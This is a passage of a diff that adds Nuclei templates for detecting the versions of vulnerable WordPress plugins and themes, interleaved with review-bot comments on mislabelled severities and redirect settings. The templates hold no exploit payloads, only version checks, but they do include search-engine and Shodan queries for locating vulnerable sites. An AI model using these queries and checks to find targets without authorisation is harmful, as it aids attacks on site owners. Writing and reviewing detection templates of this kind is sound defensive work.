internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "tickera-event-ticketing-system" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.5.4.8') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12579.yaml b/poc/cve/CVE-2024-12579.yaml new file mode 100644 index 0000000000..bad6198d01 --- /dev/null +++ b/poc/cve/CVE-2024-12579.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-12579-8e5be395d9ca09c678a7625547b378e8 + +info: + name: > + Minify HTML <= 2.1.10 - - Regular Expressions Denial of Service + author: topscoder + severity: medium + description: > + The Minify HTML plugin for WordPress is vulnerable to Regular Expression Denial of Service (ReDoS) in all versions up to, and including, 2.1.10. This is due to processing user-supplied input as a regular expression. This makes it possible for unauthenticated attackers to create comments that can cause catastrophic backtracking and break pages. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/80334e81-c33d-464c-9409-f49c34681890?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2024-12579 + metadata: + fofa-query: "wp-content/plugins/minify-html-markup/" + google-query: inurl:"/wp-content/plugins/minify-html-markup/" + shodan-query: 'vuln:CVE-2024-12579' + tags: cve,wordpress,wp-plugin,minify-html-markup,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/minify-html-markup/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "minify-html-markup" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.10') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12581.yaml b/poc/cve/CVE-2024-12581.yaml new file mode 100644 index 0000000000..7ac86668b0 --- /dev/null +++ b/poc/cve/CVE-2024-12581.yaml 
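Review bot: The `name` value contains a doubled separator, `Minify HTML <= 2.1.10 - - Regular Expressions Denial of Service`, which will appear verbatim in scan output and reports. It should read `Minify HTML <= 2.1.10 - Regular Expressions Denial of Service`. The `cvss-metrics` vector also carries `A:N` for an issue the description calls a denial of service; that looks inherited from the upstream record, so a short comment noting the discrepancy is safer than silently editing the vector.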
@@ -0,0 +1,59 @@ +id: CVE-2024-12581-76cef049807f0d0c701a5c76e40729ed + +info: + name: > + Kadence Blocks <= 3.2.53 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Gutenberg Blocks with AI by Kadence WP – Page Builder Features plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 3.2.53 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/406f3eaf-44a7-4e32-a620-8799eb74742a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-12581 + metadata: + fofa-query: "wp-content/plugins/kadence-blocks/" + google-query: inurl:"/wp-content/plugins/kadence-blocks/" + shodan-query: 'vuln:CVE-2024-12581' + tags: cve,wordpress,wp-plugin,kadence-blocks,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/kadence-blocks/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "kadence-blocks" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.2.53') \ No newline at end of file 
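Review bot: The `dsl` matcher `compare_versions(version, '<= 3.2.53')` is the only vulnerability evidence in this template, yet the description limits the issue to multi-site installations and installations where unfiltered_html has been disabled, and the single GET of `readme.txt` checks neither. A match therefore means "readme.txt reports a version in the affected range", not "this site is exploitable", and a readme whose `Stable tag` is not numeric produces no `version` and so no result at all. I would add a comment above the matcher, for example `# version-only check from readme.txt Stable tag; multisite / unfiltered_html precondition is not verified`. The CVE-2024-12628 and CVE-2024-43300 hunks state the same precondition and use the same matcher.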
diff --git a/poc/cve/CVE-2024-12628-d21dcffe48f9c4b21314ab529a797a81.yaml b/poc/cve/CVE-2024-12628-d21dcffe48f9c4b21314ab529a797a81.yaml new file mode 100644 index 0000000000..40db676121 --- /dev/null +++ b/poc/cve/CVE-2024-12628-d21dcffe48f9c4b21314ab529a797a81.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-12628-d21dcffe48f9c4b21314ab529a797a81 + +info: + name: > + bodi0’s Easy Cache <= 0.8 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The bodi0`s Easy cache plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'cache-folder' parameter in all versions up to, and including, 0.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/087034aa-efd0-44b9-9a2f-3a625806bcaa?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-12628 + metadata: + fofa-query: "wp-content/plugins/bodi0s-easy-cache/" + google-query: inurl:"/wp-content/plugins/bodi0s-easy-cache/" + shodan-query: 'vuln:CVE-2024-12628' + tags: cve,wordpress,wp-plugin,bodi0s-easy-cache,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bodi0s-easy-cache/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bodi0s-easy-cache" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.8') \ No newline at end of file diff --git a/poc/cve/CVE-2024-37250.yaml b/poc/cve/CVE-2024-37250.yaml new file mode 100644 index 0000000000..8b02f6d945 
--- /dev/null +++ b/poc/cve/CVE-2024-37250.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-37250-cec91cbf25d411fc5c4746b653491fd3 + +info: + name: > + Advanced Custom Fields Pro <= 6.3.1 - Missing Authorization + author: topscoder + severity: low + description: > + The Advanced Custom Fields Pro plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 6.3.1. This makes it possible for authenticated attackers, with contributor-level access and above, to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d8c1823c-72be-4342-b4e9-0dc18afbb4a8?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2024-37250 + metadata: + fofa-query: "wp-content/plugins/advanced-custom-fields-pro/" + google-query: inurl:"/wp-content/plugins/advanced-custom-fields-pro/" + shodan-query: 'vuln:CVE-2024-37250' + tags: cve,wordpress,wp-plugin,advanced-custom-fields-pro,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/advanced-custom-fields-pro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "advanced-custom-fields-pro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.3.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43222.yaml b/poc/cve/CVE-2024-43222.yaml new file mode 100644 index 0000000000..b9beedfdf2 --- /dev/null +++ b/poc/cve/CVE-2024-43222.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43222-a87ec38511fe9aca759e14cc043b51af + +info: + name: > + Sweet Date <= 3.7.3 - Unauthenticated Privilege Escalation + author: topscoder + severity: critical + description: > + The Sweet Date theme for WordPress is vulnerable to privilege escalation due to a missing capability check on a function in all versions up to, and including, 3.7.3. This makes it possible for unauthenticated attackers to gain elevated access to a site. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8dd34937-7641-4b9c-ba59-c4a1ec95f4cd?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-43222 + metadata: + fofa-query: "wp-content/themes/sweetdate/" + google-query: inurl:"/wp-content/themes/sweetdate/" + shodan-query: 'vuln:CVE-2024-43222' + tags: cve,wordpress,wp-theme,sweetdate,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/sweetdate/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "sweetdate" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.7.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43300.yaml b/poc/cve/CVE-2024-43300.yaml new file mode 100644 index 0000000000..6c5474610a --- /dev/null +++ b/poc/cve/CVE-2024-43300.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43300-1ff6882a36c1af79508de845a52c5f74 + +info: + name: > + Movie Database <= 1.0.11 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Movie Database plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.0.11 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e3d8daef-787d-43f1-a438-958295294f6c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-43300 + metadata: + fofa-query: "wp-content/plugins/movie-database/" + google-query: inurl:"/wp-content/plugins/movie-database/" + shodan-query: 'vuln:CVE-2024-43300' + tags: cve,wordpress,wp-plugin,movie-database,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/movie-database/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "movie-database" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.11') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43968.yaml b/poc/cve/CVE-2024-43968.yaml new file mode 100644 index 0000000000..de991b6ac7 --- /dev/null 
+++ b/poc/cve/CVE-2024-43968.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43968-4400b028a60e9b43044e8761dabd34b3 + +info: + name: > + Newspack <= 3.8.6 - Missing Authorization + author: topscoder + severity: low + description: > + The Newspack plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 3.8.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f68e6fed-1986-4172-8270-0460450d6a02?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43968 + metadata: + fofa-query: "wp-content/plugins/newspack-plugin/" + google-query: inurl:"/wp-content/plugins/newspack-plugin/" + shodan-query: 'vuln:CVE-2024-43968' + tags: cve,wordpress,wp-plugin,newspack-plugin,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/newspack-plugin/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "newspack-plugin" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.8.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-47321.yaml b/poc/cve/CVE-2024-47321.yaml new file mode 100644 index 0000000000..75199cfe83 --- /dev/null +++ b/poc/cve/CVE-2024-47321.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-47321-f5ac5a08ba05fc79b1104aeb1b8f65d9 + +info: + name: > + WP Datepicker <= 2.1.1 - Missing Authorization + author: topscoder + severity: high + description: > + The WP Datepicker plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 2.1.1. This makes it possible for unauthenticated attackers to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/38e8275f-477e-4d07-85b0-8bca71cd7089?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2024-47321 + metadata: + fofa-query: "wp-content/plugins/wp-datepicker/" + google-query: inurl:"/wp-content/plugins/wp-datepicker/" + shodan-query: 'vuln:CVE-2024-47321' + tags: cve,wordpress,wp-plugin,wp-datepicker,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-datepicker/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-datepicker" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-49323.yaml b/poc/cve/CVE-2024-49323.yaml new file mode 100644 index 0000000000..a3c42d116c --- /dev/null +++ b/poc/cve/CVE-2024-49323.yaml 
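Review bot: `severity: high` and the trailing `high` tag overstate this finding relative to its own classification, where `cvss-score: 5.3` with `C:N/I:L/A:N` is Medium under CVSS v3.1. Triage driven by the label would rank a limited-integrity missing-authorization issue alongside genuinely high-severity results. I would change it to `severity: medium` and the last tag to `medium`, unless the generator has a documented reason for the override, in which case that reason belongs in a comment next to the field.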
@@ -0,0 +1,59 @@
+id: CVE-2024-49323-61e0800fe6baa2cae8b68fbd815349c4
+
+info:
+ name: >
+ All in One Slider <= 1.1 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The All in One Slider plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/1371d1ea-a415-4cd8-bc99-a530670ffb94?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-49323
+ metadata:
+ fofa-query: "wp-content/plugins/all-in-one-slider/"
+ google-query: inurl:"/wp-content/plugins/all-in-one-slider/"
+ shodan-query: 'vuln:CVE-2024-49323'
+ tags: cve,wordpress,wp-plugin,all-in-one-slider,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/all-in-one-slider/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "all-in-one-slider"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-49334.yaml b/poc/cve/CVE-2024-49334.yaml
new file mode 100644
index 0000000000..3ebad99437
--- /dev/null
+++ b/poc/cve/CVE-2024-49334.yaml
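Review bot: `redirects: true` with `max-redirects: 3` in CVE-2024-49323.yaml follows a redirect to any host, so a readme served by a different site after a redirect can satisfy the matchers and be reported against the scanned target. Restricting the follow to the original host keeps the result attributable: replace `redirects: true` with `host-redirects: true`. The same two lines appear in every other template in this part of the patch.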
@@ -0,0 +1,59 @@
+id: CVE-2024-49334-11700dd427899256e6373b115ef06811
+
+info:
+ name: >
+ jLayer Parallax Slider <= 1.0 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The jLayer Parallax Slider plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/33e5ca87-2e45-4b85-818e-02093bbf66ee?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-49334
+ metadata:
+ fofa-query: "wp-content/plugins/jlayer-parallax-slider-wp/"
+ google-query: inurl:"/wp-content/plugins/jlayer-parallax-slider-wp/"
+ shodan-query: 'vuln:CVE-2024-49334'
+ tags: cve,wordpress,wp-plugin,jlayer-parallax-slider-wp,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/jlayer-parallax-slider-wp/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "jlayer-parallax-slider-wp"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-5029.yaml b/poc/cve/CVE-2024-5029.yaml
new file mode 100644
index 0000000000..2bb7bd864f
--- /dev/null
+++ b/poc/cve/CVE-2024-5029.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-5029-eabfce5ae00a84e55589a7640da45e1c
+
+info:
+ name: >
+ CM Table Of Contents <= 1.2.3 - Cross-Site Request Forgery
+ author: topscoder
+ severity: medium
+ description: >
+ The CM Table Of Contents – WordPress TOC Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.3. This is due to missing or incorrect nonce validation on one of its functions. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/2a5f4a74-3974-4d08-8238-387e573a5655?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-5029
+ metadata:
+ fofa-query: "wp-content/plugins/cm-table-of-content/"
+ google-query: inurl:"/wp-content/plugins/cm-table-of-content/"
+ shodan-query: 'vuln:CVE-2024-5029'
+ tags: cve,wordpress,wp-plugin,cm-table-of-content,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cm-table-of-content/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cm-table-of-content"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-50423.yaml b/poc/cve/CVE-2024-50423.yaml
new file mode 100644
index 0000000000..99de8417ec
--- /dev/null
+++ b/poc/cve/CVE-2024-50423.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-50423-e7e041c790fe504684de2e185f30a8e2
+
+info:
+ name: >
+ Templately <= 3.1.5 - Missing Authorization
+ author: topscoder
+ severity: low
+ description: >
+ The Templately plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several functions in versions up to, and including, 3.1.5. This makes it possible for authenticated attackers, with contributor-level access and above, to invoke those functions.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/63ea8485-8a3f-4d83-91ee-85591077464f?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-50423
+ metadata:
+ fofa-query: "wp-content/plugins/templately/"
+ google-query: inurl:"/wp-content/plugins/templately/"
+ shodan-query: 'vuln:CVE-2024-50423'
+ tags: cve,wordpress,wp-plugin,templately,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/templately/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "templately"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.1.5')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-50504.yaml b/poc/cve/CVE-2024-50504.yaml
new file mode 100644
index 0000000000..fe1a0da580
--- /dev/null
+++ b/poc/cve/CVE-2024-50504.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-50504-dd2a52c91cedd2c370ed91df355bfdba
+
+info:
+ name: >
+ Bulk Change Role <= 1.1 - Missing Authorization to Authenticated (Subscriber+) Privilege Escalation
+ author: topscoder
+ severity: low
+ description: >
+ The Bulk Change Role plugin for WordPress is vulnerable to privilege escalation due to a missing capability check on the bulk_change_role_callback() function in all versions up to, and including, 1.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to set their role to that of an administrator.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/e6e7889b-a1e2-439f-891d-c7c9a052cafc?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2024-50504
+ metadata:
+ fofa-query: "wp-content/plugins/bulk-role-change/"
+ google-query: inurl:"/wp-content/plugins/bulk-role-change/"
+ shodan-query: 'vuln:CVE-2024-50504'
+ tags: cve,wordpress,wp-plugin,bulk-role-change,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/bulk-role-change/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "bulk-role-change"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-50506.yaml b/poc/cve/CVE-2024-50506.yaml
new file mode 100644
index 0000000000..b5edea945b
--- /dev/null
+++ b/poc/cve/CVE-2024-50506.yaml
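Review bot: `severity: low` in CVE-2024-50504.yaml contradicts the template's own `cvss-score: 8.8` and its description of a subscriber-to-administrator privilege escalation; the label appears to follow the privilege requirement (`PR:L`) rather than the impact. Anyone filtering scan results or alerts by severity would drop this finding. The field and the matching tag should read `severity: high` and `tags: cve,wordpress,wp-plugin,bulk-role-change,high`. CVE-2024-50506.yaml and CVE-2024-50511.yaml (both 8.8, labelled low) and CVE-2024-50513.yaml (6.4, labelled low) have the same problem, and CVE-2024-47321.yaml shows the inverse (5.3 labelled high).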
@@ -0,0 +1,59 @@
+id: CVE-2024-50506-4d3cb42ced965efd1907b845f06c8f7d
+
+info:
+ name: >
+ Marketing Automation by AZEXO <= 1.27.80 - Authenticated (Subscriber+) Privilege Escalation
+ author: topscoder
+ severity: low
+ description: >
+ The Marketing Automation by AZEXO plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.27.80. This is due to the plugin not properly retricting functionality that allows a user to elevate their privileges. This makes it possible for authenticated attackers, with Subscriber-level access and above, to gain administrator access to a site.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c9a9675f-76f5-4551-8d2d-60ae7a8378d1?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2024-50506
+ metadata:
+ fofa-query: "wp-content/plugins/marketing-automation-by-azexo/"
+ google-query: inurl:"/wp-content/plugins/marketing-automation-by-azexo/"
+ shodan-query: 'vuln:CVE-2024-50506'
+ tags: cve,wordpress,wp-plugin,marketing-automation-by-azexo,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/marketing-automation-by-azexo/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "marketing-automation-by-azexo"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.27.80')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-50507.yaml b/poc/cve/CVE-2024-50507.yaml
new file mode 100644
index 0000000000..62974bf3d4
--- /dev/null
+++ b/poc/cve/CVE-2024-50507.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-50507-51ddef91051431f4533a4f6a3fe8afd5
+
+info:
+ name: >
+ DS.DownloadList <= 1.3 - Unauthenticated PHP Object Injection
+ author: topscoder
+ severity: critical
+ description: >
+ The DS.DownloadList plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.3 via deserialization of untrusted input. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/600aef49-b918-4d58-a460-f9cdbeaa17dd?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.1
+ cve-id: CVE-2024-50507
+ metadata:
+ fofa-query: "wp-content/plugins/dsdownloadlist/"
+ google-query: inurl:"/wp-content/plugins/dsdownloadlist/"
